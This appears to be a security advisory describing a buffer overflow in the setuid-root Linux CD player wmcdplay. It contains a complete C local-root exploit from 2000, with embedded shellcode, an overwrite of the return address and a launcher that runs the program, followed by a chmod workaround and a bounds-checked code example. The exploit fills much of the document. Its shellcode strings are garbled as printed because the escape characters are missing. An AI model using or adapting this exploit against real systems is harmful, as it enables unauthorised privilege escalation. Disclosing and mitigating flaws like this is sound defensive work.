
Linux wmcdplay Buffer Overflow Vulnerability

Affected systems:

Sam Hawker wmcdplay 1.0 beta1-2
  - Halloween Linux 4.0
  - Debian Linux 2.1

Description:

wmcdplay is a commonly used CD player for Unix systems, typically run under the WindowMaker X11 window manager. It is usually not installed by default. When it is installed manually, it is given the setuid root attribute. Because one of its input arguments is not bounds-checked, a buffer overflow occurs. A local user can use this to gain root privileges.

<* Source: krahmer TESO advisory -- http://teso.scene.at *>

Test method:

Warning: the following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

/*** Halloween 4 local root exploit for wmcdplay. Other distros are
 *** maybe affected as well.
 *** (C) 2000 by C-skills development. Under the GPL.
 ***
 *** Bugdiscovery + exploit by S. Krahmer & Stealth.
 ***
 *** This exploit was made (possible by|for) the team TESO and CyberPsychotic, the
 *** OpenBSD-freak. :-) Greets to all our friends. You know who you are.
 ***
 ***
 *** !!! FOR EDUCATIONAL PURPOSES ONLY !!!
 ***
 *** other advisories and kewl stuff at:
 *** http://www.cs.uni-potsdam.de/homepages/students/linuxer
 ***
 ***/
#include

/* The shellcode can't contain "/" as wmcdplay will exit then.
 * So i used Stealth's INCREDIBLE hellkit to generate these code! :-)
 */
char shell[] =
"xebx03x5exebx05xe8xf8xffxffxffx83xc6x0dx31xc9xb1x68x80x36x01x46xe2xfa"
"xeax09x2ex63x68x6fx2ex72x69x01x80xedx66x2ax01x01"
"x54x88xe4x82xedx1dx56x57x52xe9x01x01x01x01x5ax80xc2xbbx11"
"x01x01x8cxbax2bxeexfexfex30xd3xc6x44xfdx01x01x01x01x88x7c"
"xf9xb9x16x01x01x01x88xd7x52x88xf2xccx81x8cx4cxf9xb9x0ax01"
"x01x01x88xffx52x88xf2xccx81x5ax5fx5ex88xedx5cxc2x91x91x91"
"x91x91x91x91x91x91x91x91x91x91x91x91";

/* filename-buffer plus ret + ebp - defaultpath */
#define buflen (256+8 - 28)

#error "no kids please"

int main(int argc, char **argv)
{
    char *wm[] = {
        "/usr/X11R6/bin/wmcdplay",
        "-f",
        "-display",
        "0:0",  /* one might comment this if already running on X; remotely you can
                 * give your own server
                 */
        0
    };
    char boom[buflen+10];
    int i = 0, j = 0, ret = 0xbffff796; /* this address works for me */

    memset(boom, 0, sizeof(boom));
    memset(boom, 0x90, buflen);
    if (argc > 1)
        ret += atoi(argv[1]);
    else
        printf("You can also add an offset to the commandline. 40 worked for me on the console. ");
    for (i = buflen-strlen(shell)-4; i < buflen-4; i++)
        boom[i] = shell[j++];
    *(long*)(&boom[i]) = ret;
    printf("Get the real deal at http://www.cs.uni-potsdam.de/homepages/students/linuxer "
           "Respect other users privacy! ");
    execl(wm[0], wm[0], wm[1], boom, wm[2], wm[3], 0);
    return 0;
}

Recommendation:

Temporary workaround:

chmod u-s /usr/X11R6/bin/wmcdplay
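The missing bounds check described above, shown in its corrected form as an added example (this is not wmcdplay's source and not part of the advisory). The function name build_art_path, the directory DEFAULT_DIR and the buffer layout are assumptions, sized after the exploit's "256+8 - 28" comment (a 256-byte filename buffer holding a 28-byte default path plus the -f argument).

```c
#include <stdio.h>
#include <string.h>

#define PATH_BUF 256   /* filename buffer size, from the exploit's "256+8 - 28" comment */

/* Hypothetical default directory: a 28-byte stand-in for the default
 * path that the exploit subtracts from the buffer length. */
static const char DEFAULT_DIR[] = "/usr/X11R6/lib/wmcdplay/art/";

/*
 * Build "<DEFAULT_DIR><name>" into dst without ever writing past dstlen.
 * Returns 0 on success, -1 if the name is empty, contains '/', or would
 * not fit. On failure dst is left as the empty string.
 */
int build_art_path(char *dst, size_t dstlen, const char *name)
{
    int n;

    if (dst == NULL || dstlen == 0)
        return -1;
    dst[0] = '\0';
    if (name == NULL || name[0] == '\0' || strchr(name, '/') != NULL)
        return -1;

    /* snprintf returns the length it needed; >= dstlen means truncation. */
    n = snprintf(dst, dstlen, "%s%s", DEFAULT_DIR, name);
    if (n < 0 || (size_t)n >= dstlen) {
        dst[0] = '\0';
        return -1;
    }
    return 0;
}

int main(int argc, char **argv)
{
    char path[PATH_BUF];
    const char *name = argc > 1 ? argv[1] : "default.art";

    /* Reject the argument instead of copying it unchecked. */
    if (build_art_path(path, sizeof(path), name) != 0) {
        fprintf(stderr, "invalid or over-long -f argument\n");
        return 1;
    }
    printf("%s\n", path);
    return 0;
}
```

A setuid program should also drop its privileges before it parses any command-line arguments, so that a parsing bug of this kind does not run as root.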